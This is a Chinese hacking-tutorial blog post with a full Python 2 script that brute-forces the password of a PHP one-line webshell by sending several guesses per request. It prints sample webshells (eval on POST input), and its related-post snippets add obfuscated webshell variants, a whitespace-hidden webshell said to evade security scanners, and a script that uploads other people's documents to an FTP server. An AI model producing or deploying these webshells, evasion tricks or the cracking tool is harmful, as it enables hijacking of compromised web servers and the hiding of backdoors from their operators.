【PyHacker编写指南】爆破一句话密码

python实现生成隐藏的一句话木马】 这个webshell的原理就是每一行最后都有空格与制表符。\t的数量代表着ascii码16进制的第一位,空格的数量代表着ascii码16进制的第二位。然后有个关键的15,其实代表了前15行的空白字符组成的是create_function,后面就可以写一句话咯,例如@eval($_GET["pass"]);demo.php这样就可以生成一个让人摸不着头脑的php木马文件,内容和demo.php一模一样,但是利用webshellkiller工具、安全狗、D盾是无法识别出来的。... 阅读详情

这节课是巡安似海PyHacker编写指南的《编写漏洞POC

使用Python编写一句话密码爆破工具,解脱双手。

编写环境:Python2.x


00x1:

需要用到的模块如下:

import requests

00x2:

首先我们了解一下一句话马,一般post传递参数

一个简单的php一句话

<?phpeval($_POST['x'])?>

OK,没问题,我们用浏览器打开传参看一下

由此可以看到密码为x,变量提交能匹配上即执行echo语句

这时我猜大家都有了思路,构造post请求即可

00x3:

这里我们可以利用网址特性提交多个参数

这样可以提高爆破效率

分析完成,下面我们开始进行写脚本

00x4:

简单爆破shell密码,shell为字典

#!/usr/bin/python#-*- coding:utf-8 -*-import requestsdef req(url,s):    global html    data = {s:'echo xc666;'}    req = requests.post(url,data=data)    html = req.contentshell = ['z','y','x']for s in shell:    req('http://127.0.0.1/shell.php',s)    if 'xc666' in html:        print "[+]Find password",s        break

00x5:

下面我们按我们刚才说的,一次多个参数,增加效率

首先整理一下字典

data = {s:'echo %s;'%s,ss:'echo %s;'%ss}shell = []def shelllist():    f = open('shell.txt','r')    for x in f.readlines(): #去除换行等字符        x = x.strip()        shell.append(x)    print u"shell密码个数为:",len(shell)
for i in range(0,len(shell),2): #分割列表    b=shell[i:i+2]    print b

我们一次性提交两个参数测试一下

def main():    shelllist()    for i in range(0,len(shell),2): #分割列表        b=shell[i:i+2]        req('http://127.0.0.1/shell.php',b[0],b[1])        if b[0] in html:            print "[+]Find password",b[0]            break        elif b[1] in html:            print "[+]Find password", b[1]            breakmain()

测试一下,一次执行两个密码

00x6:

完整代码:

一次爆破5次密码,可自行调整

#!/usr/bin/python#-*- coding:utf-8 -*-import requestsdef req(url,s,ss,sss,ssss,sssss):    global html    data = {s:'echo xc666%s;'%s,            ss:'echo xc666%s;'%ss,            sss:'echo xc666%s;'%sss,            ssss:'echo xc666%s;'%ssss,            sssss:'echo xc666%s;'%sssss,}    req = requests.post(url,data=data)    html = req.content    print req.url,s,ss,sss,ssss,sssss
shell = []def shelllist():    f = open('shell.txt','r')    for x in f.readlines(): #去除换行等字符        x = x.strip()        shell.append(x)    print u"\nshell密码个数为:",len(shell)
def main():    shelllist()    url = raw_input('\nshell url:')    if 'http' not in url:        url = 'http://'+url    for i in range(0,len(shell),5): #分割列表        b=shell[i:i+5]        req(url,b[0],b[1],b[2],b[3],b[4])        if "xc666%s"%b[0] in html:            print "\n[+]Find password",b[0]            break        elif "xc666%s"%b[1] in html:            print "\n[+]Find password", b[1]            break        elif "xc666%s"%b[2] in html:            print "\n[+]Find password",b[2]            break        elif "xc666%s"%b[3] in html:            print "\n[+]Find password", b[3]            break        elif "xc666%s"%b[4] in html:            print "\n[+]Find password", b[4]            breakif __name__ == '__main__':    main()

喜欢的点个赞叭~

一句话密码暴力破解篇(黑吃黑) 一句话暴力破解 1.1 我们得知一句话木马地址为:http://10.10.87.211/test.php,当我们不知道密码的时候该如何破解其密码? 1.2 @eval($_POST[“123456”]) 我们得知一句话木马eval 可以将里面的内容执行,我们可以利用这个机制(先用我们已知的小马进行实验) 我们首先创建一个form表单,表单提交地址为小马地址 我们打开浏览器,在里面提交内容,而后进行抓包,在Repeater中打开 我们发现,在最下方出现了我们上传的内容以及文本框的nam 阅读详情

相关推荐

安鸾渗透实战平台——一句话密码破解 (250分)

漏洞环境 安鸾渗透实战平台 kali虚拟机 题目信息 这里只给了IP,不知道一句话木马的位置,直接上工具跑他的网站目录 dirsearch -u 118.190.133.35:8089 [04:34:35] Starting: [04:34:36] 200 - 763B - /.git/branches/ [04:34:36] 301 - 321B - /.git -> http://118.190.133.35:8089/.git/ [04:34:36] 200 - 3KB

weixin_50985113的博客 5204

[原创]K8一句话密码爆破工具{秒破10万} 支持ASP/PHP/ASPX/JSP/CFM/DIY-附件资源

[原创]K8一句话密码爆破工具{秒破10万} 支持ASP/PHP/ASPX/JSP/CFM/DIY-附件资源

暴力破解一句话木马密码

破解一句话木马 暴力破解

爆破胡同的博客 8129

SHELL爆破 可编辑字典

一个shell爆破工具,还挺好用的

2022-渗透测试-口令破解-几款暴力破解和字典生成的工具

1.CUPP(kali) 首先,安装cupp软件 apt install -y cupp 新建一个文件夹,用于保存生成的字典 输入 cupp -i 命令开始编辑生成字典 根据自己已知的信息,生成字典。 查看生成的字典 cat san.txt 2.亦思社会工程学学点生成器 3.一句话密码破解工具 4.crunch(kali) crunch是kali自带的工具,是一种创建密码字典的工具。按照指定的规则生成密码字典,可以灵活的定制自己的字典文件。 ...

保持微笑的博客 1万+

如何用python写一个小木马

这个python木马更准确来说算不上是木马,只能是一个小工具,主要功能是来获取本地doc或者txt文档甚至是图片的,并把这些文档压缩直接通过FTP上传到服务器。这不禁让我想起了上学的时候,上选修课的时候,老师所讲的讲义是不会下发的,但是他的讲义全都是试题,对于一个经常翘课的我来说,上课认真听讲是不存在的。第一步、提取当前目录下png、jpg结尾的文件,注意很多图片格式还有可能是jpeg的。注意:FPT服务器的端口一定要开放,否则会出现上传失败的情况。我在想如何能“偷”到老师的试题,于是这个脚本孕育而生。

assion 2000

介绍6款密码暴力破解工具

Hydra(九头蛇)是THC组织开发的,是一款非常流行的密码破解工具,可以对多种服务的账号和密码进行爆破,包括 Web 登录、数据库、 SSH、 FTP 等服务,支持 Linux、Windows、 Mac 平台安装,其中 Kali Linux中自带 Hydra。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

Python_0011的博客 2万+

python之提速千倍爆破一句话

难易程度★★★ 阅读点 完整的原理解读与工具开发过程详述 文章作者Binghe 文章来源i春秋原创奖励计划 时间 2016年12月19日12.00 前言:最初思路源于T00ls版主接地气,一个低调、热心的安全研究者。向技术研究者和...

chengman3837的博客 246

[原创]K8一句话密码爆破工具{秒破10万} 支持ASP/PHP/ASPX/JSP/CFM/DIY

工具:K8_FuckOneShell 20161224编译:VS2012C#(.NETFrameworkv4.0)组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2016/12/2413:32:04简介:采用多参数同时提交1000密码,本地内网测试10万/秒,3400万分别5-10分钟不等支持ASP/P...

weixin_30258901的博客 1748

python+php一句话木马的利用

python知识点,php一句话木马

CYLK1987310466的博客 1711

Python安全工具之一句话密码爆破(秒破十万)

今天看到t00ls某版主发出的一个帖子,说一秒爆十万密码。 原理: 其原理就是apache和iis可以多参数提交,apache最多同时提交1000个参数,而iis据说可以提交5883个参数,那么就可以批量提交千个参数去判断哪个是一句话密码,效率就比一个一个参数提交提高了千倍! 操作: 输入正常密码时,会显示。我们可以放多个看看。 大概的原理明白了,就开始写Py...

weixin_30241919的博客 1031

绕过token进行密码爆破(包含python攻击脚本)

设置完毕以后开始爆破,时间取决于你的字典,如果是1个线程还没有办法爆破成功,可能是你的字典里面没有这个密码,在爆破页面我们将返回长度按照从大到小排列,就可以看到爆破成功的密码和其他的米密码长度不同。Token其实说的更通俗点可以叫暗号,在一些数据传输之前,要先进行暗号的核对,不同的暗号被授权不同的数据操作。6.服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据。选择需要抓取的Token的内容,同时设置和响应中相同的参数名字,点击OK。

weixin_43960066的博客 2007

python写一个爆破网站管理员密码脚本

python脚本用requests库的post方法发送http post数据包,通过读取字典文件的方式来进行密码猜解,为了程序美观还加入了程序logo和彩色显示。

柠檬i的博客 8222

牛逼的一句话木码

//可执行命令一句话 普通一句话 <?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?> PHP系列 <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xindong']);?> <?php $k="as

Daoke37的博客 629

hydra暴力破解ftp-telnet-mysql-ssh-http

使用此命令,会枚举出网站已经注册的用户名,枚举出用户名之后,就可以通过xmlrpc.php或者后台登录页面进行爆破,对应的防御手段就是禁用掉xmlrpc.php并对后台进行隐藏

WEB渗透测试 从入门到萌新 8472

密码破译主流工具和口令库

它有一个名为“Intruder”的功能,允许用单词列表中的值替换用户名和密码字段, Burp 的核心功能是拦截代理,允许用户通过 Burp 代理服务器重定向浏览器流量,同时针对特定的 Web 应用程序,使其成为识别和解决 Web 应用程序漏洞的重要工具。John是另一款出色的密码破解工具,它采用多种方法尝试破解密码。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

Python_0011的博客 3527

Python脚本--shadow密码爆破

【代码】Python脚本--shadow密码爆破

m0_62202418的博客 641
上一篇: 【PyHacker编写指南】实战编写漏洞POC
下一篇: 【PyHacker编写指南】经常会用到的模块
巡安似海
博客等级 码龄4年 25粉丝 · 27原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巡安似海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值